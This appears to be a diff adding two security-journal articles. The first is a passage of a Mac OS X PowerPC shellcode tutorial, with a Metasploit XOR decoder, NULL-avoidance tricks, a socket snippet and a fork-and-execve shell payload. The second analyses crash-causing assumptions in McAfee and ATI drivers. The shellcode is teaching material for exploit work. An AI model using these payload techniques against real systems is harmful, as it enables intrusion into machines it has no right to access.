;; Load a 32-bit immediate value and store it to the stack
;;
main:

    lis r5, 0x1122      ; load the high bits of the value
                        ; r5 contains 0x11220000

    ori r5, r5, 0x3344  ; load the low bits of the value
                        ; r5 now contains 0x11223344

    stw r5, 20(r1)      ; store this value to SP+20
    lwz r3, 20(r1)      ; load this value back to r3


2.4) L1 Cache

The PowerPC processor uses one or more on-chip memory caches to accelerate
access to frequently referenced data and instructions. This cache memory is
separated into a distinct data and instruction cache. Although the data
cache operates in coherent mode on Mac OS X, shellcode developers need to be
aware of how the data cache and the instruction cache interoperate when
executing self-modifying code.

As a superscalar architecture, the PowerPC processor contains multiple
execution units, each of which has a pipeline. The pipeline can be described
as a conveyor belt in a factory; as an instruction moves down the belt,
specific steps are performed. To increase the efficiency of the pipeline,
multiple instructions can be put on the belt at the same time, one behind
another. The processor will attempt to predict which direction a branch
instruction will take and then feed the pipeline with instructions from the
predicted path. If the prediction was wrong, the contents of the pipeline
are trashed and correct instructions are loaded into the pipeline instead.

This pipelined execution means that more than one instruction can be
processed at the same time in each execution unit. If one instruction
requires the output of another, a gap can occur in the pipeline while these
dependencies are satisfied. In the case of a store instruction, the contents
of the data cache will be updated before the results are flushed back to
main memory. If a load instruction is executed directly after the store, it
will obtain the newly-updated value. This occurs because the load
instruction will read the value from the data cache, where it has already
been updated.

The instruction cache is a different beast altogether. On the PowerPC
platform, the instruction cache is incoherent. If an executable region of
memory is modified and that region is already loaded into the instruction
cache, the modified instructions will not be executed unless the cache is
specifically flushed.
The instruction cache is filled from main memory, not the data cache. If you
attempt to modify executable code through a store instruction, flush the
cache, and then attempt to execute that code, there is still a chance that
the original, unmodified code will be executed instead. This can occur
because the data cache was not flushed back to main memory before the
instruction cache was filled.

The solution is a bit tricky: you must use the "dcbf" instruction to
invalidate each block of memory from the data cache, wait for the
invalidation to complete with the "sync" instruction, and then flush the
instruction cache for that block with "icbi". Finally, the "isync"
instruction needs to be executed before the modified code is actually used.
Placing these instructions in any other order may result in stale data being
left in the instruction cache. Due to these restrictions, self-modifying
shellcode on the PowerPC platform is rare and often unreliable.

The example below is a working PowerPC shellcode decoder included with the
Metasploit Framework (OSXPPCLongXOR).

;;
;; Demonstrate a cache-safe payload decoder
;; Based on Dino Dai Zovi's PPC decoder (20030821)
;;
main:
    xor. r5, r5, r5        ; Ensure that the cr0 flag is always 'equal'
    bnel main              ; Branch if cr0 is not-equal and link to main
    mflr r31               ; Move the address of main into r31
    addi r31, r31, 68+1974 ; 68 = distance from branch -> payload
                           ; 1974 is null eliding constant
    subi r5, r5, 1974      ; We need this for the dcbf and icbi
    lis r6, 0x9999         ; XOR key = hi16(0x99999999)
    ori r6, r6, 0x9999     ; XOR key = lo16(0x99999999)
    addi r4, r5, 1974 + 4  ; Move the number of words to decode into r4
    mtctr r4               ; Set the count register to the word count

xorlp:
    lwz r4, -1974(r31)     ; Load the encoded word from memory
    xor r4, r4, r6         ; XOR this word against our key in r6
    stw r4, -1974(r31)     ; Store the modified word back to memory
    dcbf r5, r31           ; Flush the modified word to main memory
    .long 0x7cff04ac       ; Wait for the data block flush (sync)
    icbi r5, r31           ; Invalidate prefetched block from i-cache

    subi r30, r5, -1978    ; Move to next word without using a NULL
    add. r31, r31, r30

    bdnz- xorlp            ; Branch if --count != 0
    .long 0x4cff012c       ; Wait for i-cache to synchronize (isync)

    ; Insert XORed payload here
    .long (0x7fe00008 ^ 0x99999999)

3) Avoiding NULLs

One of the most common problems encountered with shellcode development in
general and RISC processors in particular is avoiding NULL bytes in the
assembled code. On the IA32 platform, NULL bytes are fairly easy to dodge,
mostly due to the variable-length instruction set and multiple opcodes
available for a given task. Fixed-width opcode architectures, like PowerPC,
have fixed field sizes and often pad those fields with all zero bits.
Instructions that have a set of undefined bits often set these bits to zero
as well. The result is that many of the available opcodes are impossible to
use with NULL-free shellcode without modification.

On many platforms, self-modifying code can be used to work around NULL byte
restrictions. This technique is not useful for single-instruction patching
on PowerPC, since the instruction pre-fetch and instruction cache can result
in the non-modified instruction being executed instead.


3.1) Undefined Bits

To write interesting shellcode for Mac OS X, you need to use system calls.
One of the first problems encountered with the PowerPC platform is that the
system call instruction assembles to 0x44000002, which contains two NULL
bytes. If we take a look at the IBM PowerPC reference for the 'sc'
instruction, we see that the bit layout is as follows:

010001 00000 00000 0000 0000000 000 1 0
------ ----- ----- ---- ------- --- - -
   A     B     C    D      E     F  G H

These 32 bits are broken down into eight specific fields. The first field
(A), which is 6 bits wide, must be set to the value 17. The bits that make
up B, C, and D are all marked as undefined. Field E must be set to either 1
or 0. Fields F and H are undefined, and G must always be set to 1. We can
modify the undefined bits to anything we like, in order to make the
corresponding byte values NULL-free. The first step is to reorder these bits
along byte boundaries and mark what we are able to change.

? = undefined
# = zero or one
[010001??] [????????] [????0000] [00#???1?]

The first byte of this instruction can be either 68, 69, 70, or 71 (the
ASCII characters 'D', 'E', 'F', and 'G'). The second byte can be any
character at all. The third byte can either be 0, 16, 32, 48, 64, 80, 96,
112, 128, 144, 160, 176, 192, 208, 224, or 240 (which contains '0', 'P', and
'p', among others). The fourth value can be any of the following values: 2,
3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31, 34, 35, 38, 39, 42,
43, 46, 47, 50, 51, 54, 55, 58, 59, 62, 63. As you can see, it is possible
to create thousands of different opcodes that are all treated by the
processor as a system call. The same technique can be applied to almost any
other instruction that has undefined bits. Although the current line of
PowerPC chips used with Mac OS X seem to ignore the undefined bits, future
processors may actually use these bits. It is entirely possible that
undefined bit abuse can prevent your code from working on newer processors.

;;
;; Patching the undefined bits in the 'sc' opcode
;;
main:
    li r0, 1          ; sys_exit
    li r3, 0          ; exit status
    .long 0x45585037  ; sc patched as "EXP7"


3.2) Index Registers

On the PowerPC platform, immediate values are encoded using all 16 bits. If
the assembled value of your immediate contains a NULL, you will need to find
another way to load it into the target register. The most common technique
is to first load a NULL-free value into a register, then subtract from that
value the difference to your immediate.

;;
;; Demonstrate index register usage
;;
main:
    li r7, 1999         ; place a NULL-free value into the index
    subi r5, r7, 1999-1 ; subtract the difference to the target value
                        ; the r5 register is now set to 1

If you have a rough idea of the immediate values you will need in your
shellcode, you can take this a step further. Set your initial index register
to a value that, when decremented by the immediate value, actually results
in a character of your choice. If you have two distant ranges (1-10 and
50-60), then consider using two index registers. The example below
demonstrates an index register that works for the system call number as well
as the arguments, leaving the assembled bytes NULL-free. As you can see,
besides the four bytes required to set the index register, this method does
not significantly increase the size of the code.
+ +;; +;; Create a TCP socket without NULL bytes +;; +main: + li r7, 0x3330 ; 0x38e03330 = NULL-free index value + subi r0, r7, 0x3330-97 ; 0x3807cd31 = system call for sys_socket + subi r3, r7, 0x3330-2 ; 0x3867ccd2 = socket domain + subi r4, r7, 0x3330-1 ; 0x3887ccd1 = socket type + subi r5, r7, 0x3330-6 ; 0x38a7ccd6 = socket protocol + .long 0x45585037 ; patched 'sc' instruction + + +3.3) Branching + +Branching to a forward address without using NULL bytes can be tricky on +PowerPC systems. If you try branching forward, but less than 256 bytes, your +opcode will contain a NULL. If you obtain your current address and want to +branch to an offset from it, you will need to place the target address into the +count register (ctr) or the link register (lr). If you decide to use the link +register, you will notice that every valid form of "blr" has a NULL byte. You +can avoid the NULL byte by setting the branch hint bits (19-20) to "11" +(unpredictable branch, do not optimize). The resulting opcode becomes +0x4e804820 instead of 0x4e800020 for the standard "blr" instruction. + +The branch prediction bit (bit 10) can also come in handy, it is useful if you +need to change the second byte of the branch instruction to a different +character. The prediction bit tells the processor how likely it is that the +instruction will result in a branch. To specify the branch prediction bit in +the assembly source, just place '-' or '+' after the branch instruction. + + +4) Mac OS X Tricks + +This section describes a handful of tips and tricks for writing shellcode on +the Mac OS X platform. + + +4.1) Diagnostic Tools + +Mac OS X includes a solid collection of development and diagnostic tools, many +of which are invaluable for shellcode and exploit development. The list below +describes some of the most commonly used tools and how they relate to shellcode +development. + + Xcode: This package includes 'gdb', 'gcc', and 'as'. Sadly, objdump is not + included and most disassembly needs to be done with 'gdb' or 'otool'. + ktrace: The ktrace and kdump tools are equivalent to strace on Linux and truss + on Solaris. There is no better tool for quickly diagnosing shellcode + bugs. + vmmap: If you were looking for the equivalent of /proc/pid/maps, you found it. + Use vmmap to figure out where the heap, library, and stacks are mapped. + crashreporterd: This daemon runs by default and creates very nice crash dumps + when a system service dies. Invaluable for finding 0-day in Mac OS X + services. The crashdump logs can be found in /Library/Logs/CrashReporter. + heap: Quickly list all heaps in a process. This can be handy when the + instruction cache prevents a direct return and you need to find an + alternate shellcode location. + otool: List all libraries linked to a given binary, disassemble mach-o + binaries, and display the contents of any section of an executable or + library. This is the equivalent of 'ldd' and 'objdump' rolled into a + single utility + + +4.2) System Call Failure + +An interesting feature of Mac OS X is that a successful system call will return +to the address 4 bytes after the end of 'sc' instruction and a failed system +call will return directly after the 'sc' instruction. This allows you to +execute a specific instruction only when the system call fails. The most common +application of this feature is to branch to an error handler, although it can +also be used to set a flag or a return value. 
When writing shellcode, this +feature is usually more annoying than anything else, since it boosts the size +of your code by four bytes per system call. In some cases though, this feature +can be used to shave an instruction or two off the final payload. + + +4.3) Threads and Execve + +Mac OS X has an undocumented behavior concerning the execve() system call +inside a threaded process. If a process tries to call execve() and has more +than one active thread, the kernel returns the error EOPNOTSUPP. After a closer +look at kernexec.c in the Darwin XNU source code, it becomes apparent that for +shellcode to function properly inside a threaded process, it will need to call +either fork() or vfork() before calling execve(). + +;; +;; Fork and execute a command shell +;; +main: +_fork: + li r0, 2 + sc + b _exitproc + +_execsh: ; based on ghandi's execve + xor. r5, r5, r5 + bnel _execsh + mflr r3 + addi r3, r3, 32 ; 32 + stw r3, -8(r1) ; argv[0] = path + stw r5, -4(r1) ; argv[1] = NULL + subi r4, r1, 8 ; r4 = {path, 0} + li r0, 59 + sc ; execve(path, argv, NULL) + b _exitproc + +_path: + .ascii "/bin/csh" ; csh handles seteuid() for us + .long 0 + +_exitproc: + li r0, 1 + li r3, 0 + sc + +4.4) Shared Libraries + +The Mac OS X user community tends to have one thing in common -- they keep +their systems up to date. The Apple Software Update service, once enabled, is +very insistent about installing new software releases as they become available. +The result is that nearly every single Mac OS X system has the exact same +binaries. System libraries are often loaded at the exact same virtual address +across all applications. In this sense, Mac OS X is starting to resemble the +Windows platform. + +If all processes on all Mac OS X system have the same virtual addresses for the +same libraries, Windows-style shellcode starts to become possible. Assuming you +can find the right argument-setting code in a shared library, return-to-library +payloads also become much more feasible. These libraries can be used as return +addresses, similar to how Windows exploits often return back to a loaded DLL. +Some useful addresses are listed below: + + + 0x90000000: The base address of the system library (libSystem.B.dylib), most + of the function locations are static across all versions of OS X. + 0xffff8000: The base address of the "common" page. A number of useful + functions and instructions can be found here. These functions + include memcpy, sysdcacheflush, sysicacheinvalidate, and bcopy. + + +The following NULL-free example uses the sysicacheinvalidate function to flush +1040 bytes from the instruction cache, starting at the address of the payload: + +;; +;; Flush the instruction cache in 32 bytes +;; +main: +_main: + xor. r5, r5, r5 + bnel main + mflr r3 + +;; flush 1040 bytes starting after the branch + li r4, 1024+16 + +;; 0xffff8520 is __sys_icache_invalidate() + addis r8, r5, hi16(0xffff8520) + ori r8, r8, lo16(0xffff8520) + mtctr r8 + bctrl + + +5) Conclusion + +In the first section, we covered the fundamentals of the PowerPC platform and +described the syscall calling convention used on the Darwin/Mac OS X platform. +The second section introduced a few techniques for removing NULL bytes from +some common instructions. In the third section, we presented some of the tools +and techniques that can be useful for shellcode development. + + +Bibliography + +B-r00t PowerPC / OSX (Darwin) Shellcode Assembly. 
+http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf + + +Bunda, Potter, Shadowen Powerpc Microprocessor Developer\'s Guide. +http://www.amazon.com/exec/obidos/tg/detail/-/0672305437/ + +Steve Heath Newnes Power PC Programming Pocket Book. +http://www.amazon.com/exec/obidos/tg/detail/-/0750621117/ + + +IBM PowerPC Assembler Language Reference. +http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/mastertoc.htm diff --git a/uninformed/1.7.txt b/uninformed/1.7.txt new file mode 100644 index 0000000..f087851 --- /dev/null +++ b/uninformed/1.7.txt @@ -0,0 +1,567 @@ +What Were They Thinking? +Annoyances Caused by Unsafe Assumptions +skape +mmiller@hick.org +Last modified: 04/04/2005 + + +1) Introduction + +There is perhaps no issue more dear to a developer's heart than the +issue of interoperability with third-party applications. In some +cases, software that is being written by one developer has to be +altered in order to make it function properly when used in +conjunction with another application that is created by a +third-party. For the sake of illustration, the lone developer will +henceforth be referred to as the protagonist given his or her +valiant efforts in their quest to obtain that which is almost always +unattainable: interoperability. The third-parties, on the other +hand, will be referred to as the antagonists due to their wretched +attempts to prevent the protagonist from obtaining his or her goal +of a utopian software environment. Now, granted, that's not to say +that the protagonist can't also become the antagonist by continuing +the ugly cycle of exposing compatibility issues to other would-be +protagonists, but for the sake of discussion such a point is not +relevant. + +What is relevant, however, are the ways in which an antagonistic +developer can write software that will force other developers to +work around issues exposed by the software that the antagonist has +written. There are far too many specific issues to list, but the +majority of these issues can be generalized into one category that +will serve as the focus for this document. To put it simply, many +developers make assumptions about the state of the machine that +their software will be executing on. For instance, some software +will assume that they are the only piece of software performing a +given task on a machine. In the event that another piece of software +attempts to perform a similar task, such as may occur when two +applications need to extend APIs by hooking them, the results may be +unpredictable. Perhaps a more concrete example of where assumptions +can lead to problems can be seen when developers assume that the +behavior of undocumented or unexposed APIs will not change. + +Before putting all of the blame on the antagonists, however, it is +important to understand that it is, in most cases, necessary to make +assumptions about the way in which undocumented code performs, such +as when dealing with low-level software. This is especially true +when dealing with closed-source APIs, such as those provided by +Microsoft. To that point, Microsoft has made an effort to document +the ways in which every exposed API routine can perform, thereby +reducing the number of compatibility issues that a developer might +experience if they were to assume that a given routine would always +perform in the same manner. Furthermore, Microsoft is renowned for +attempting to always provide backwards compatibility. 
If a +Microsoft application performs one way in a given release, chances +are that it will continue to perform in the same fashion in +subsequent releases. Third-party vendors, on the other hand, tend to +have a more egocentric view of the way in which their software +should work. This leads most vendors to dodge responsibility by +pointing the blame at the application that is attempting to perform +a certain task rather than making their code to be more robust. + +In the interest of helping to make code more robust, this document +will provide two examples of widely used software that make +assumptions about the way in which code will execute on a given +machine. The assumptions these applications make are always safe +under normal conditions. However, if a new application that +performs a certain task or an undocumented change is thrown into the +mix, the applications find themselves faltering in the most +unenjoyable ways. The two applications that will be analyzed are +listed below: + + - McAfee VirusScan Consumer (8.0/9.0) + - ATI Radeon 9000 Driver Series + +Each of the assumptions that these two software products make will +be analyzed in-depth to describe why it is that they are poor +assumptions to make, such as by describing or illustrating +conditions where the assumptions are, or could be, false. From +there, suggestions will be made on how these assumptions might be +worked around or fixed to allow for a more stable product in +general. In the end, the reader should have a clear understanding of +the assumptions described in this document. If successful, the +author hopes the topic will allow the reader to think critically +about the various assumptions the reader might make when +implementing software. + + +2) McAfee VirusScan Consumer (8.0/9.0) + + +2.1) The Assumption + +McAfee VirusScan Consumer 8.0, 9.0, and possibly previous versions +make assumptions about processes not performing certain types of +file operations during a critical phase of process initialization. +If file operations are performed during this phase, the machine may +blue screen due to an invalid pointer access. + + +2.2) The Problem + +The critical phase of process execution that the summary refers to is the +period between the time that the new process object instance is created by +nt!ObCreateObject and the time the new process object is inserted into the +process object type list by nt!ObInsertObject. The reason this phase is so +critical is because it is not safe for things to attempt to obtain a handle to +the process object, such as can be done by calling nt!ObOpenObjectByPointer. +If an application were to attempt to obtain a handle to the process object +before it had been inserted into the process object list by nt!ObInsertObject, +critical creation state information that is stored in the process object's +header would be overwritten with state information that is meant to be used +after the process has passed the initial security validation phase that is +handled by nt!ObInsertObject. In some cases, overwriting the creation state +information prior to calling nt!ObInsertObject can lead to invalid pointer +references when nt!ObInsertObject is eventually called, thus leading to an evil +blue screen that some users are all too familiar with. + +To better understand this problem it is first necessary to understand the way +in which nt!PspCreateProcess creates and initializes the process object and the +process handle that is passed back to callers. 
The object creation portion is +accomplished by making a call to nt!ObCreateObject in the following fashion: + +ObCreateObject( + KeGetPreviousMode(), + PsProcessType, + ObjectAttributes, + KeGetPreviousMode(), + 0, + 0x258, + 0, + 0, + &ProcessObject); + +If the call is successful, a process object of the supplied size is created and +initialized using the attributes supplied by the caller. In this case, the +object is created using the nt!PsProcessType object type. The size argument +that is supplied to nt!ObCreateObject, which in this case is 0x258, will vary +between various versions of Windows as new fields are added and removed from +the opaque EPROCESS structure. The process object's instance, as with all +objects, is prefixed with an OBJECT_HEADER that may or may not also be prefixed +with optional object information. For reference, the OBJECT_HEADER structure is +defined as follows: + +OBJECT_HEADER: + +0x000 PointerCount : Int4B + +0x004 HandleCount : Int4B + +0x004 NextToFree : Ptr32 Void + +0x008 Type : Ptr32 _OBJECT_TYPE + +0x00c NameInfoOffset : UChar + +0x00d HandleInfoOffset : UChar + +0x00e QuotaInfoOffset : UChar + +0x00f Flags : UChar + +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION + +0x010 QuotaBlockCharged : Ptr32 Void + +0x014 SecurityDescriptor : Ptr32 Void + +0x018 Body : _QUAD + +When an object is first returned from nt!ObCreateObject, the Flags attribute +will indicate if the ObjectCreateInfo attribute is pointing to valid data by +having the OB_FLAG_CREATE_INFO, or 0x1 bit, set. If the flag is set then the +ObjectCreateInfo attribute will point to an OBJECT_CREATE_INFORMATION structure +which has the following definition: + +OBJECT_CREATE_INFORMATION: + +0x000 Attributes : Uint4B + +0x004 RootDirectory : Ptr32 Void + +0x008 ParseContext : Ptr32 Void + +0x00c ProbeMode : Char + +0x010 PagedPoolCharge : Uint4B + +0x014 NonPagedPoolCharge : Uint4B + +0x018 SecurityDescriptorCharge : Uint4B + +0x01c SecurityDescriptor : Ptr32 Void + +0x020 SecurityQos : Ptr32 _SECURITY_QUALITY_OF_SERVICE + +0x024 SecurityQualityOfService : _SECURITY_QUALITY_OF_SERVICE + +When nt!ObInsertObject is finally called, it is assumed that the object still +has the OB_FLAG_CREATE_INFO bit set. This will always be the case unless something +has caused the bit to be cleared, as will be illustrated later in this chapter. +The flow of execution within nt!ObInsertObject begins first by checking to see +if the process' object header has any name information, which is conveyed by +the NameInfoOffset of the OBJECT_HEADER. Regardless of whether or not the +object has name information, the next step taken is to check to see if the +object type that is associated with the object that is supplied to +nt!ObInsertObject requires a security check to be performed. 
This requirement +is conveyed through the TypeInfo attribute of the OBJECT_TYPE structure which is +defined below: + +OBJECT_TYPE: + +0x000 Mutex : _ERESOURCE + +0x038 TypeList : _LIST_ENTRY + +0x040 Name : _UNICODE_STRING + +0x048 DefaultObject : Ptr32 Void + +0x04c Index : Uint4B + +0x050 TotalNumberOfObjects : Uint4B + +0x054 TotalNumberOfHandles : Uint4B + +0x058 HighWaterNumberOfObjects : Uint4B + +0x05c HighWaterNumberOfHandles : Uint4B + +0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER + +0x0ac Key : Uint4B + +0x0b0 ObjectLocks : [4] _ERESOURCE + +OBJECT_TYPE_INITIALIZER: + +0x000 Length : Uint2B + +0x002 UseDefaultObject : UChar + +0x003 CaseInsensitive : UChar + +0x004 InvalidAttributes : Uint4B + +0x008 GenericMapping : _GENERIC_MAPPING + +0x018 ValidAccessMask : Uint4B + +0x01c SecurityRequired : UChar + +0x01d MaintainHandleCount : UChar + +0x01e MaintainTypeList : UChar + +0x020 PoolType : _POOL_TYPE + +0x024 DefaultPagedPoolCharge : Uint4B + +0x028 DefaultNonPagedPoolCharge : Uint4B + +0x02c DumpProcedure : Ptr32 + +0x030 OpenProcedure : Ptr32 + +0x034 CloseProcedure : Ptr32 + +0x038 DeleteProcedure : Ptr32 + +0x03c ParseProcedure : Ptr32 + +0x040 SecurityProcedure : Ptr32 + +0x044 QueryNameProcedure : Ptr32 + +0x048 OkayToCloseProcedure : Ptr32 + +The specific boolean field that is checked by nt!ObInsertObject is the +TypeInfo.SecurityRequired flag. If the flag is set to TRUE, which it is for +the nt!PsProcessType object type, then nt!ObInsertObject uses the access state +that is passed in as the second argument or creates a temporary access state +that it uses to validate the access mask that is supplied as the third argument +to nt!ObInsertObject. Prior to validating the access state, however, the +SecurityDescriptor attribute of the ACCESS_STATE structure is set to the +SecurityDescriptor of the OBJECT_CREATE_INFORMATION structure. This is done +without any checks to ensure that the OB_FLAG_CREATE_INFO flag is still set in the +object's header, thus making it potentially dangerous if the flag has been +cleared and the union'd attribute no longer points to creation information. + +In order to validate the access mask, nt!ObInsertObject calls into +nt!ObpValidateAccessMask with the initialized ACCESS_STATE as the only argument. +This function first checks to see if the ACCESS_STATE's SecurityDescriptor +attribute is set to NULL. If it's not, then the function checks to see if the +SecurityDescriptor's Control attribute has a flag set. It is at this point +that the problem is realized under conditions where the object's +ObjectCreateInfo attribute no longer points to creation information. When such +a condition occurs, the SecurityDescriptor attribute that is referenced +relative to the ObjectCreateInfo attribute will potentially point to invalid +memory. This can then lead to an access violation when attempting to reference +the SecurityDescriptor that is passed as part of the ACCESS_STATE instance to +nt!ObpValidateAccessMask. 
For reference, the ACCESS_STATE structure is defined +below: + +ACCESS_STATE: + +0x000 OperationID : _LUID + +0x008 SecurityEvaluated : UChar + +0x009 GenerateAudit : UChar + +0x00a GenerateOnClose : UChar + +0x00b PrivilegesAllocated : UChar + +0x00c Flags : Uint4B + +0x010 RemainingDesiredAccess : Uint4B + +0x014 PreviouslyGrantedAccess : Uint4B + +0x018 OriginalDesiredAccess : Uint4B + +0x01c SubjectSecurityContext : _SECURITY_SUBJECT_CONTEXT + +0x02c SecurityDescriptor : Ptr32 Void + +0x030 AuxData : Ptr32 Void + +0x034 Privileges : __unnamed + +0x060 AuditPrivileges : UChar + +0x064 ObjectName : _UNICODE_STRING + +0x06c ObjectTypeName : _UNICODE_STRING + +Under normal conditions, nt!ObInsertObject is the first routine to create a +handle to the newly created object instance. When the handle is created, the +creation information that was initialized during the instantiation of the +object is used for such things as validating access, as described above. Once +the creation information is used it is discarded and replaced with other +information that is specific to the type of the object being inserted. In the +case of process objects, the Flags attribute has the OB_FLAG_CREATE_INFO bit +cleared and the QuotaBlockCharged attribute, which is union'd with the +ObjectCreateInfo attribute, is set to an instance of an EPROCESS_QUOTA_BLOCK +which is defined below: + +EPROCESS_QUOTA_ENTRY: + +0x000 Usage : Uint4B + +0x004 Limit : Uint4B + +0x008 Peak : Uint4B + +0x00c Return : Uint4B + +EPROCESS_QUOTA_BLOCK: + +0x000 QuotaEntry : [3] _EPROCESS_QUOTA_ENTRY + +0x030 QuotaList : _LIST_ENTRY + +0x038 ReferenceCount : Uint4B + +0x03c ProcessCount : Uint4B + +The assumptions made by nt!ObInsertObject work flawlessly so long as it is the +first routine to create a handle to the object instance. Fortunately, under +normal circumstances, nt!ObInsertObject is always the first routine to create a +handle to the object. Unfortunately for McAfee, however, they assume that they +can safely attempt to obtain a handle to a process object without first +checking to see what state of execution the process is in, such as by checking +to see if the OB_FLAG_CREATE_INFO flag is set in the object's header. By +attempting to obtain a handle to the process object before it is inserted by +nt!ObInsertObject, McAfee effectively destroys state that is needed by +nt!ObInsertObject to succeed. + +To show this problem being experienced in the real world, the following +debugger output shows McAfee first attempting to obtain a handle to the process +object which is then followed shortly thereafter by nt!ObInsertObject +attempting to validate the object's access mask with a bogus SecurityDescriptor +which, in turn, results in an unrecoverable access violation: + +McAfee attempting to open a handle to the process object before +nt!ObInsertObject has been called: + +kd> k +nt!ObpChargeQuotaForObject+0x2f +nt!ObpIncrementHandleCount+0x70 +nt!ObpCreateHandle+0x17c +nt!ObOpenObjectByPointer+0x97 +WARNING: Stack unwind information not available. 
+NaiFiltr+0x2e45 +NaiFiltr+0x3bb2 +NaiFiltr+0x4217 +nt!ObpLookupObjectName+0x56a +nt!ObOpenObjectByName+0xe9 +nt!IopCreateFile+0x407 +nt!IoCreateFile+0x36 +nt!NtOpenFile+0x25 +nt!KiSystemService+0xc4 +nt!ZwOpenFile+0x11 +0x80a367b5 +nt!PspCreateProcess+0x326 +nt!NtCreateProcessEx+0x7e +nt!KiSystemService+0xc4 + +After which point nt!ObInsertObject attempts to validate the +object's access mask using an invalid SecurityDescriptor: + +kd> k +nt!ObpValidateAccessMask+0xb +nt!ObInsertObject+0x1c2 +nt!PspCreateProcess+0x5dc +nt!NtCreateProcessEx+0x7e +nt!KiSystemService+0xc4 +kd> r +eax=fa7bbb54 ebx=ffa9fc60 ecx=00023994 +edx=00000000 esi=00000000 edi=ffb83f00 +eip=8057828e esp=fa7bbb40 ebp=fa7bbbb8 +iopl=0 nv up ei pl nz na pe nc +cs=0008 ss=0010 ds=0023 es=0023 +fs=0030 gs=0000 efl=00000202 +nt!ObpValidateAccessMask+0xb: +8057828e f6410210 + test byte ptr [ecx+0x2],0x10 ds:0023:00023996=?? + +The method by which this issue was located was by setting a breakpoint on the +instruction after the call to nt!ObCreateObject in nt!PspCreateProcess. Once +hit, a memory access breakpoint was set on the Flags attribute of the object's +header that would break whenever the field was written to. This, in turn, lead +to the tracking down of the fact that McAfee was acquiring a handle to the +process object prior to nt!ObInsertObject being called, which in turn lead to +the OB_FLAG_CREATE_INFO flag being cleared and the ObjectCreateInfo attribute +being invalidated. + + +2.3) The Solution + +There are two ways that have been identified that could correct this issue. +The first, and most plausible, would be for McAfee to modify their driver such +that it will refuse to acquire a handle to a process object if the +OB_FLAG_CREATE_INFO bit is set in the process' object header Flags attribute. The +downside to using this approach is that it requires McAfee to make use of +undocumented structures that are intended by Microsoft to be opaque, and for +good reason. However, the author is not currently aware of another means by +which an object's creation state can be detected using general purpose API +routines. + +The second approach, and it's one that should at least result in a bugcheck +within nt!ObInsertObject, would be to check to see if the object's +OB_FLAG_CREATE_INFO bit has been cleared. If it has, an alternate action can be +taken to validate the object's access mask. If it hasn't, the current method +of validating the access mask can be used. At this point in time, the author +cannot currently speak on what the alternate action would be, though it seems +plausible that there would be another means by which a synonymous action could +be performed without relying on the creation information in the object header. + +In the event that neither of these solutions are pursued, it will continue to +be necessary for protagonistic developers to avoid performing actions between +nt!ObCreateObject and nt!ObInsertObject that might result in file operations +being performed from within the new process' context. One of a number of +work-arounds to this problem would be to post file operations off to a system +worker thread that would then inherently run within the context of the System +process rather than the new process. 
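As a rough sketch of that work-around, a filter driver could hand the file
work off to a system worker thread using the documented ExQueueWorkItem
interface. The context structure and routine names below are invented for
illustration, and this is not McAfee's actual code; it simply shows the
deferral pattern under that assumption.

#include <ntddk.h>

typedef struct _DEFERRED_SCAN_CONTEXT {
    WORK_QUEUE_ITEM WorkItem;
    UNICODE_STRING  Path;        /* path the filter wants to examine */
} DEFERRED_SCAN_CONTEXT, *PDEFERRED_SCAN_CONTEXT;

/* Runs at PASSIVE_LEVEL in the context of the System process, so any
 * handle it opens is not created inside the half-initialized process. */
static VOID DeferredScanWorker(PVOID Parameter)
{
    PDEFERRED_SCAN_CONTEXT Ctx = (PDEFERRED_SCAN_CONTEXT)Parameter;

    /* ... perform the ZwCreateFile/ZwReadFile scanning work here ... */

    ExFreePoolWithTag(Ctx, 'nacS');
}

static NTSTATUS QueueDeferredScan(PUNICODE_STRING Path)
{
    PDEFERRED_SCAN_CONTEXT Ctx;

    Ctx = ExAllocatePoolWithTag(NonPagedPool, sizeof(*Ctx), 'nacS');
    if (Ctx == NULL)
        return STATUS_INSUFFICIENT_RESOURCES;

    Ctx->Path = *Path;           /* shallow copy for brevity; a real driver
                                    would duplicate the string buffer */

    ExInitializeWorkItem(&Ctx->WorkItem, DeferredScanWorker, Ctx);
    ExQueueWorkItem(&Ctx->WorkItem, DelayedWorkQueue);

    return STATUS_SUCCESS;
}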
+ + +3) ATI Radeon 9000 Driver Series + + +3.1) The Assumption + +The ATI Radeon 9000 Driver Series, and likely other ATI driver series, makes +assumptions about the location that the RTL_USER_PROCESS_PARAMETERS structure will +be mapped at in the address space of a process that attempts to do 3D +operations. If the structure is not mapped at the address that is expected, +the machine may blue screen depending on the values that exist at the memory +location, if any. + + +3.2) The Problem + +During some experimentation with changing the default address space layout of +processes on NT-based versions of Windows, it was noticed that machines that +were using the ATI Radeon 9000 series drivers would crash if a process +attempted to do 3D operations and the location of the process' parameter +information was changed from the address at which it is normally mapped at. +Before proceeding, it is first necessary for the reader to understand the +purpose of the process parameter information structure and how it is that it's +mapped into the process' address space. + +Most programmers are familiar with the API routine kernel32!CreateProcess[A/W]. +This routine serves as the primary means by which user-mode applications spawn +new processes. The function itself is robust enough to support a number of +ways in which a new process can be initialized and then executed. Behind the +scenes, CreateProcess performs all of the necessary operations to prepare the +new task for execution. These options include opening the executable image +file and creating a section object that is then passed to +ntdll!NtCreateProcessEx which returns a unique process handle on success. If a +handle is obtained, CreateProcess then proceeds to prepare the process for +execution by initializing the process' parameters as well as creating and +initializing the first thread in the process. A more complete analysis of the +way in which CreateProcess operates can be found in David Probert's excellent +analysis of Windows NT's process architecture. + +For the purpose of this document, however, the part that is of most concern is +that step in which CreateProcess initializes the new process' parameters. This +is accomplished by making a call into kernel32!BasePushProcessParameters which +in turn calls into ntdll!RtlCreateProcessParameters. The parameters are +initialized within the process that is calling CreateProcess and are then, in +turn, copied into the address space of the new process by first allocating +storage with ntdll!NtAllocateVirtualMemory and then by copying the memory from +the parent process to the child with ntdll!NtWriteVirtualMemory. Due to the +fact that this occurs before the new process actually executes any code, the +address that the process parameter structure is allocated at is almost +guaranteed to be at the same address. This address happens to be 0x00020000. +This fact is most likely why ATI made the assumption that the process parameter +information would always be at a static address. + +If, however, ntdll!NtAllocateVirtualMemory allocates the process parameter +storage at any place other than the static address described above, ATI's +driver will attempt to reference a potentially invalid address when it comes +time to perform 3D operations. The specific portion of the driver suite that +has the error is the ATI3DUAG.DLL kernel-mode graphics driver. 
